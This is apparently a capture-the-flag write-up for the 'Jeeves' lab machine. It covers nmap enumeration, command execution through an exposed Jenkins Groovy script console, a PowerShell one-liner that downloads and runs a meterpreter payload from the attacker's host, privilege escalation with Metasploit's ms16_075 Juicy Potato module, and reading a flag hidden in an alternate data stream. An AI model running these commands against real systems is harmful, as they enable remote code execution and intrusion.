Jeeves

OS: Windows, Difficulty: Medium, IP: 10.10.10.63

Initial Enumeration

# Nmap 7.70 scan initiated Mon Jul 22 01:27:35 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,135,445,50000 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.34s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10 (88%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1511 - 1607 (85%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h53m14s, deviation: 0s, median: 4h53m14s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-22 06:21:13
|_  start_date: 2019-07-22 06:08:01

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   234.36 ms 10.10.14.1
2   411.09 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 22 01:28:34 2019 -- 1 IP address (1 host up) scanned in 59.36 seconds

SMB ports, guest account disabled, anonymous login disabled. No luck. Gobuster for port 80, nothing, however for port 50000 there was something interesting.

/askjeeves (Status: 302)

http://10.10.10.63:50000/askjeeves/computer/(master)/script

However I upgrade the commands to the following to have better output

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c $COMMAND_GOES_HERE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

echo $webclient = New-Object System.Net.WebClient >>wget.ps1 & echo $url = \"http://10.10.14.13/shell.exe\" >>wget.ps1 & echo $file = \"shell.exe\" >>wget.ps1 & echo $webclient.DownloadFile($url,$file) >>wget.ps1 & powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 & exploit.exe

Executed the command above to get a wget.ps1 file that downloads my meterpreter shell into the system and executes it, this got me user shell on MSF Console.

User Own

C:\Users\kohsuke\Desktop>type user.txt                                     
type user.txt                        
e3232***

Root Own

msf5 post(multi/recon/local_exploit_suggester) > run                       

[*] 10.10.10.63 - Collecting local exploits for x64/windows...             
[*] 10.10.10.63 - 11 exploit checks are being tried...                     
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.                                                      
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.                                                
[*] Post module execution completed  
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run                

[*] Started reverse TCP handler on 10.10.14.13:4444                        
[*] Launching notepad to host the exploit...                               
[+] Process 3760 launched.           
[*] Reflectively injecting the exploit DLL into 3760...                    
[*] Injecting exploit into 3760...   
[*] Exploit injected. Injecting exploit configuration into 3760...         
[*] Configuration injected. Executing exploit...                           
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.                                                                   
[*] Sending stage (179779 bytes) to 10.10.10.63                            
[*] Meterpreter session 3 opened (10.10.14.13:4444 -> 10.10.10.63:49686) at 2019-07-22 19:49:54 +0530                                                  

meterpreter > getuid                 
Server username: NT AUTHORITY\SYSTEM

Got system shell, however there was no root.txt file in the Administrator/Desktop folder, as there is supposed to be however there was a text stating the following.

C:\Users\Administrator\Desktop>type hm.txt                                 
type hm.txt                          
The flag is elsewhere.  Look deeper.

After investing 3-4 Hours figuring out, the following thing worked.

C:\Users\Administrator\Desktop>dir /R
dir /R                               
 Volume in drive C has no label.     
 Volume Serial Number is BE50-B1C9   

 Directory of C:\Users\Administrator\Desktop                               

11/08/2017  10:05 AM    <DIR>          .                                   
11/08/2017  10:05 AM    <DIR>          ..                                  
11/03/2017  10:03 PM               282 desktop.ini                         
12/24/2017  03:51 AM                36 hm.txt                              
                                    34 hm.txt:root.txt:$DATA               
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk     
               3 File(s)          1,115 bytes                              
               2 Dir(s)   7,477,682,176 bytes free                         

C:\Users\Administrator\Desktop>type  hm.txt:root.txt:$DATA                 
type  hm.txt:root.txt:$DATA          
The filename, directory name, or volume label syntax is incorrect.         

C:\Users\Administrator\Desktop>type hm.txt:root.txt                        
type hm.txt:root.txt                 
The filename, directory name, or volume label syntax is incorrect.         

C:\Users\Administrator\Desktop>more < hm.txt:root.txt                      
more < hm.txt:root.txt               
afbc5***

Learning Outcome

Always enumerate for alternate data sources of files as well as for hidden files.

PreviousSilo NextAccess

Last updated 6 years ago

hashtagInitial Enumeration

hashtagUser Own

hashtagRoot Own

hashtagLearning Outcome

Initial Enumeration

User Own

Root Own

Learning Outcome